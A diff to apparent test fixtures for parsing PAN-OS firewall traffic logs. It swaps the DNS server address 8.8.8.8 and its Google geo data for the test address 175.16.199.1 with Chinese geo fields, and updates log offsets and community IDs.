@@ -1778,17 +1784,18 @@ "client.nat.port": 26532, "client.packets": 1, "client.port": 49896, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 0, "destination.port": 53, 
@@ -1802,7 +1809,7 @@ "event.end": "2020-03-27T09:57:37.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7754,1,49896,53,26532,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:37,0,any,0,2825904,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7754,1,49896,53,26532,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:37,0,any,0,2825904,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:37.000+01:00", "event.timezone": "+01:00", @@ -1814,12 +1821,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 8679, + "log.offset": 8739, "network.application": "dns", "network.bytes": 97, "network.community_id": [ - "1:GDOk7pO/jZK+JyTDzy1NqvVqOIg=", - "1:J+/8ysWuhaQSrvytWp5VX6HVI54=" + "1:Xi4r7FyHRYN16DOZwoONkQRY4wM=", + "1:yHC1ROehyCrFS9sQ7OnreJRygT4=" ], "network.direction": "unknown", "network.packets": 1, 
@@ -1836,12 +1843,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "n/a", "panw.panos.flow_id": "7754", - "panw.panos.network.nat.community_id": "1:J+/8ysWuhaQSrvytWp5VX6HVI54=", + "panw.panos.network.nat.community_id": "1:Xi4r7FyHRYN16DOZwoONkQRY4wM=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825904, "panw.panos.source.interface": "ethernet1/3", @@ -1857,13 +1864,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 0, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 0, "server.port": 53, 
@@ -1888,17 +1895,18 @@ "client.nat.port": 35535, "client.packets": 1, "client.port": 40588, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 0, "destination.port": 53, 
@@ -1912,7 +1920,7 @@ "event.end": "2020-03-27T09:57:37.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7885,1,40588,53,35535,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:37,0,any,0,2825909,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "521 <14>1 2020-03-27T09:57:36+01:00 PA-VM - - - - 1,2020/03/27 09:57:36,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:36,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:36,7885,1,40588,53,35535,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:37,0,any,0,2825909,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:37.000+01:00", "event.timezone": "+01:00", @@ -1924,12 +1932,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 9180, + "log.offset": 9250, "network.application": "dns", "network.bytes": 98, "network.community_id": [ - "1:IdNgziYzUkYe11urTk+eBYrKBE0=", - "1:kKp5J6TDKwzYZeDdlhTQBSa/dBs=" + "1:StDFltYPKrirY65Q8/Xg3s4uH4w=", + "1:rtVuhed64FEI6y/7w5Zm107EJSk=" ], "network.direction": "unknown", "network.packets": 1, 
@@ -1946,12 +1954,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "n/a", "panw.panos.flow_id": "7885", - "panw.panos.network.nat.community_id": "1:kKp5J6TDKwzYZeDdlhTQBSa/dBs=", + "panw.panos.network.nat.community_id": "1:rtVuhed64FEI6y/7w5Zm107EJSk=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825909, "panw.panos.source.interface": "ethernet1/3", @@ -1967,13 +1975,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 0, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 0, "server.port": 53, @@ -1999,14 +2007,7 @@ "client.packets": 3, "client.port": 59655, "destination.address": "172.217.23.174", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 66, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "172.217.23.174", "destination.nat.ip": "172.217.23.174", "destination.nat.port": 443, @@ -2034,7 +2035,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 9681, + "log.offset": 9761, "network.application": "ssl", "network.bytes": 763, "network.community_id": [ 
@@ -2109,14 +2110,7 @@ "client.packets": 6, "client.port": 59655, "destination.address": "172.217.23.174", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 4146, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "172.217.23.174", "destination.nat.ip": "172.217.23.174", "destination.nat.port": 443, @@ -2145,7 +2139,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 10201, + "log.offset": 10281, "network.application": "web-browsing", "network.bytes": 5451, "network.community_id": [ @@ -2220,14 +2214,7 @@ "client.packets": 6, "client.port": 59655, "destination.address": "172.217.23.174", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 4146, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "172.217.23.174", "destination.nat.ip": "172.217.23.174", "destination.nat.port": 443, @@ -2256,7 +2243,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 10736, + "log.offset": 10816, "network.application": "google-base", "network.bytes": 5451, "network.community_id": [ @@ -2359,7 +2346,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 11281, + "log.offset": 11361, "network.application": "ssl", "network.bytes": 575, "network.community_id": [ 
@@ -2461,7 +2448,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 11780, + "log.offset": 11860, "network.application": "ssl", "network.bytes": 763, "network.community_id": [ @@ -2563,7 +2550,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 12286, + "log.offset": 12366, "network.application": "ssl", "network.bytes": 112771, "network.community_id": [ @@ -2666,7 +2653,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 12825, + "log.offset": 12905, "network.application": "google-base", "network.bytes": 7130, "network.community_id": [ @@ -2740,14 +2727,7 @@ "client.packets": 6, "client.port": 59654, "destination.address": "172.217.23.174", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 4147, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "172.217.23.174", "destination.nat.ip": "172.217.23.174", "destination.nat.port": 443, @@ -2776,7 +2756,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 13371, + "log.offset": 13451, "network.application": "web-browsing", "network.bytes": 5409, "network.community_id": [ 
@@ -2851,14 +2831,7 @@ "client.packets": 3, "client.port": 59654, "destination.address": "172.217.23.174", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 66, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "172.217.23.174", "destination.nat.ip": "172.217.23.174", "destination.nat.port": 443, @@ -2886,7 +2859,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 13906, + "log.offset": 13986, "network.application": "ssl", "network.bytes": 763, "network.community_id": [ @@ -2961,14 +2934,7 @@ "client.packets": 6, "client.port": 59654, "destination.address": "172.217.23.174", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 4147, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "172.217.23.174", "destination.nat.ip": "172.217.23.174", "destination.nat.port": 443, @@ -2997,7 +2963,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 14426, + "log.offset": 14506, "network.application": "google-base", "network.bytes": 5409, "network.community_id": [ 
@@ -3071,17 +3037,18 @@ "client.nat.port": 14789, "client.packets": 1, "client.port": 46872, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 125, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -3095,7 +3062,7 @@ "event.end": "2020-03-27T09:57:03.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "528 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:32,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:32,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:32,7412,1,46872,53,14789,53,0x400064,udp,allow,234,109,125,2,2020/03/27 09:57:03,0,any,0,2825887,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "528 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:32,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:32,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:32,7412,1,46872,53,14789,53,0x400064,udp,allow,234,109,125,2,2020/03/27 09:57:03,0,any,0,2825887,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:03.000+01:00", "event.timezone": "+01:00", @@ -3107,12 +3074,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 14971, + "log.offset": 15051, "network.application": "dns", "network.bytes": 234, "network.community_id": [ - "1:4P50J/H6IWSECotqpob5wRHADD8=", - "1:wilpAH8tCL0ic1Q7T+FapvU2oc0=" + "1:+ON0iUdGzcnAd/FhYZPqU0iKdik=", + "1:L2TG4rR8WSLsCfYtff+I41wsn1M=" ], "network.direction": "unknown", "network.packets": 2, 
@@ -3129,12 +3096,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "7412", - "panw.panos.network.nat.community_id": "1:wilpAH8tCL0ic1Q7T+FapvU2oc0=", + "panw.panos.network.nat.community_id": "1:+ON0iUdGzcnAd/FhYZPqU0iKdik=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825887, "panw.panos.source.interface": "ethernet1/3", @@ -3150,13 +3117,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 125, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -3210,7 +3177,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 15479, + "log.offset": 15569, "network.application": "ssl", "network.bytes": 905, "network.community_id": [ @@ -3313,7 +3280,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 15983, + "log.offset": 16073, "network.application": "google-base", "network.bytes": 6398, "network.community_id": [ 
@@ -3386,17 +3353,18 @@ "client.nat.port": 39786, "client.packets": 1, "client.port": 51210, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 0, "destination.port": 53, 
@@ -3410,7 +3378,7 @@ "event.end": "2020-03-27T09:57:32.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "523 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7460,1,51210,53,39786,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:32,0,any,0,2825882,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "523 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7460,1,51210,53,39786,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:32,0,any,0,2825882,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:32.000+01:00", "event.timezone": "+01:00", @@ -3422,12 +3390,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 16530, + "log.offset": 16620, "network.application": "dns", "network.bytes": 108, "network.community_id": [ - "1:qxDBcqAWxR8SogCdnvdJWTgWms4=", - "1:xp7zCX+vHDMEvd7q1q/QqO3ZTRA=" + "1:gKUp6pqT5tUocgaDs381ZXodOag=", + "1:iw2t9VYpS6M+PlAegoX8bTwnweo=" ], "network.direction": "unknown", "network.packets": 1, 
@@ -3444,12 +3412,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "n/a", "panw.panos.flow_id": "7460", - "panw.panos.network.nat.community_id": "1:qxDBcqAWxR8SogCdnvdJWTgWms4=", + "panw.panos.network.nat.community_id": "1:gKUp6pqT5tUocgaDs381ZXodOag=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825882, "panw.panos.source.interface": "ethernet1/3", @@ -3465,13 +3433,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 0, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 0, "server.port": 53, 
@@ -3496,17 +3464,18 @@ "client.nat.port": 4178, "client.packets": 1, "client.port": 56105, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 0, "destination.port": 53, 
@@ -3520,7 +3489,7 @@ "event.end": "2020-03-27T09:57:32.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "520 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7365,1,56105,53,4178,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:32,0,any,0,2825883,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "520 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7365,1,56105,53,4178,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:32,0,any,0,2825883,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:32.000+01:00", "event.timezone": "+01:00", @@ -3532,12 +3501,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 17033, + "log.offset": 17133, "network.application": "dns", "network.bytes": 97, "network.community_id": [ - "1:7yw1i+xHMyZyx6Z2svN7WU59dYA=", - "1:NZYr++3HBWAJIECsCokc4QeNROU=" + "1:9quKNIQ2DFkPSYoCJwpJRTS55Mc=", + "1:g3AJSrbN7D7jhn2LAu2D4tBBdYI=" ], "network.direction": "unknown", "network.packets": 1, 
@@ -3554,12 +3523,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "n/a", "panw.panos.flow_id": "7365", - "panw.panos.network.nat.community_id": "1:NZYr++3HBWAJIECsCokc4QeNROU=", + "panw.panos.network.nat.community_id": "1:g3AJSrbN7D7jhn2LAu2D4tBBdYI=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825883, "panw.panos.source.interface": "ethernet1/3", @@ -3575,13 +3544,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 0, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 0, "server.port": 53, @@ -3635,7 +3604,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 17533, + "log.offset": 17643, "network.application": "ssl", "network.bytes": 575, "network.community_id": [ 
@@ -3708,17 +3677,18 @@ "client.nat.port": 26434, "client.packets": 1, "client.port": 40172, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 0, "destination.port": 53, 
@@ -3732,7 +3702,7 @@ "event.end": "2020-03-27T09:57:32.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "521 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7790,1,40172,53,26434,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:32,0,any,0,2825885,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "521 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7790,1,40172,53,26434,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:32,0,any,0,2825885,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:32.000+01:00", "event.timezone": "+01:00", @@ -3744,12 +3714,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 18033, + "log.offset": 18143, "network.application": "dns", "network.bytes": 98, "network.community_id": [ - "1:/Xbja5IEOIk5q43dYJYT0/XSuTI=", - "1:kOzD0I5XRtXVwtlBFlzfhN6dr28=" + "1:7HmvD/OLe083Tynm5UcUyuzDk1w=", + "1:TTd1TSJEBk7IlFsYjhJ94nL5+Y8=" ], "network.direction": "unknown", "network.packets": 1, 
@@ -3766,12 +3736,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "n/a", "panw.panos.flow_id": "7790", - "panw.panos.network.nat.community_id": "1:kOzD0I5XRtXVwtlBFlzfhN6dr28=", + "panw.panos.network.nat.community_id": "1:7HmvD/OLe083Tynm5UcUyuzDk1w=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825885, "panw.panos.source.interface": "ethernet1/3", @@ -3787,13 +3757,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 0, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 0, "server.port": 53, 